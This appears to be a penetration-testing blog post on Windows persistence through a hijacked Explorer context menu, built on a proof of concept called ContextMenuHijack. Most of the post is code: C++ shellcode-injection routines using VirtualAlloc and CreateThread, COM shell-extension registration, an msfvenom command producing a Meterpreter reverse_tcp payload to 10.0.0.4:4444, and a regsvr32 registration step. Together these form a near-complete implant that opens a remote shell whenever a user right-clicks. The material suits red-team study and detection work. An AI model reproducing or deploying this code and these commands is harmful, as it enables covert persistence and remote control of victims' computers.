Context menu provides shortcuts to the user in order to perform a number of actions. The context menu is invoked with a right mouse click and it is a very common action for every Windows user. In offensive operations this action could be weaponized for persistence by executing shellcode every time the user attempts to use the context menu.

RistBS developed a proof of concept called ContextMenuHijack which can leverage the context menu for persistence by registering a COM object. The “VirtualAlloc” function is used in order to allocate a memory region which the executed shellcode will be stored.

void InjectShc() 
{
    DWORD dwOldProtect = 0;
    LPVOID addr = VirtualAlloc( NULL, sizeof( buf ), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE );
    memcpy( addr, buf, sizeof( buf ) );

    VirtualProtect( addr, sizeof( buf ), PAGE_EXECUTE_READ, &dwOldProtect );

    ( ( void( * )() )addr )();
}
Context Menu – VirtualAlloc

The code below is used to receive information about the component which the user is going to select and the “CreateThread” will create a new thread that will execute the shellcode. 

IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID )
{
    DWORD tid = NULL;
    CreateThread( NULL, 1024 * 1024, ( LPTHREAD_START_ROUTINE )InjectShc, NULL, 0, &tid );

    if ( NULL == pDataObj ) {
                if ( pidlFolder != NULL ) {
                }
        return S_OK;
    }
        return S_OK;
}
Context Menu – Initialize & CreateThread

The “QueryInterface” method will query an object for the set of interfaces.

IFACEMETHODIMP FileContextMenuExt::QueryInterface(REFIID riid, void **ppv)
{
    static const QITAB qit[] = 
    {
        QITABENT( FileContextMenuExt, IContextMenu  ),
                QITABENT( FileContextMenuExt, IContextMenu2 ),
                QITABENT( FileContextMenuExt, IContextMenu3 ),
        QITABENT( FileContextMenuExt, IShellExtInit ), 
        { 0 },
    };
    return QISearch( this, qit, riid, ppv );
Context Menu – QueryInterface

The context menu handler will be registered as a COM object and therefore the “RegisterInprocServer” function is called.

   hr = RegisterInprocServer( szModule, CLSID_FileContextMenuExt, L"ContextMenuHijack.FileContextMenuExt Class", L"Apartment" );
    if ( SUCCEEDED( hr ) ) {
        hr = RegisterShellExtContextMenuHandler( L"AllFilesystemObjects", CLSID_FileContextMenuExt, L"ContextMenuHijack.FileContextMenuExt" );
    }
        
    return hr;
}
Context Menu – RegisterInprocServer

The Metasploit framework utility “msfvenom” can be used to generated the shellcode that would be written in a text file. 

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.4 LPORT=4444 EXITFUNC=thread -f c > pentestlab.txt
Context Menu – msfvenom Shellcode

Once the code is compiled will generate a DLL. The utility “regsvr32” can register the DLL with the operating system.

regsvr32 ContextMenuHijack.dll
Context Menu – DLL Register Server

Once the user performs a right click on the windows environment over an object (file or folder) the code will executed and a communication channel will established as it can be demonstrated below.

Context Menu – Meterpreter

References